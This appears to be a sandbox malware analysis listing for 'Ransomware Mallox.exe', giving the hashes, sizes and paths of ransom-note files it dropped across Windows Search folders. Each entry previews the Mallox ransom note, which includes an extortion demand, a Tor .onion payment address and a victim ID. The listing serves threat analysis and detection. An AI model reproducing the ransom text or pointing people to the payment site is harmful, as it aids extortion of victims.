                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Tokenuserer\Cache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Tokenuserer\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{0d2763c3-fa4b-42b8-81c7-aece4561e09a}\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c7301d75-db6f-4f1b-8080-baf677b42a70}\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{e4c2625a-b98b-49ab-a32e-06632da575fe}\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{b0935dcd-5d87-43cb-823b-9e699e3682d5}\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{123f189b-8fca-42bd-8093-ff6cd6c6efea}\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76bf534c-af25-4adc-9f72-953b74fae18c}\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\Flighting\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
